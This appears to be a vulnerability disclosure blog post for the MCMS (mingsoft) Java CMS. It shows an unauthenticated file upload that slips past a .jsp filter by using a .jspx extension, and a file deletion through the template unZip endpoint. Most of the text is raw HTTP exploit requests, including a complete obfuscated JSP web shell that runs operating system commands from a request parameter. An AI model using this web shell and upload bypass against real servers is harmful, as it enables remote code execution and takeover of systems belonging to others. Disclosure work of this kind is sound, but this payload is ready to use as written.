![](https://gitee.com/tjdx1817054/typora/raw/master/1640674695100-2021-12-2814:58:15.png)

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674447313-2021-12-2814:54:07.png)

need login get Cookie and upload file

**Unauthorized file upload to RCE**

path `/file/upload`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674792504-2021-12-2814:59:52.png)

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674556372-2021-12-2814:55:56.png)

as above picture ,hacker can upload `.jspx` file to server without any identity verification , **and even when project packaged war deploy in tomcat can get web shell from server.**

> the system filter suffix `.jsp` but still can use `.jspx` to bypass

**payload**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  

POST /file/upload.do HTTP/1.1  
Host: 192.168.100.103:8080  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------124088951720288539841514905041  
Content-Length: 1393  
Origin: http://192.168.100.103:8080  
Connection: keep-alive  
  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="uploadPath"  
  
/  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="isRename"  
  
false  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="appId"  
  
false  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="file"; filename="shell.jspx"  
Content-Type: image/png  
  
<%@ page contentType="text/html;charset=UTF-8" language="java" %>  
<%@ page import="sun.misc.BASE64Decoder" %>  
<%  
if(request.getParameter("cmd")!=null){  
    BASE64Decoder decoder = new BASE64Decoder();  
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));  
    Process e = (Process)  
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new  
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new  
                    Object\[\]{}), request.getParameter("cmd") );  
    java.io.InputStream in = e.getInputStream();  
    int a = -1;  
    byte\[\] b = new byte\[2048\];  
    out.print("<pre>");  
    while((a=in.read(b))!=-1){  
        out.println(new String(b));  
    }  
    out.print("</pre>");  
}  
%>  
\-----------------------------124088951720288539841514905041--  
  

**source**

`net/mingsoft/basic/action/ManageFileAction.java`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640675058416-2021-12-2815:04:18.png)

**Authorized file delete**

![](https://gitee.com/tjdx1817054/typora/raw/master/1640675200781-2021-12-2815:06:40.png)

`net/mingsoft/basic/action/TemplateAction.java`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640668607171-2021-12-2813:16:47.png)

**payload**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  

GET /ms/template/unZip.do?fileUrl=HACKED HTTP/1.1  
Host: 192.168.100.103:8080  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
Pragma: no-cache  
X-Requested-With: XMLHttpRequest  
Connection: keep-alive  
Referer: http://192.168.100.103:8080/ms/template/index.do?  
Cookie: JSESSIONID=56EC9CCC14E1E8DEE4AACCF732EA7FC7; pageno\_cookie=1  

****

Tag

#xss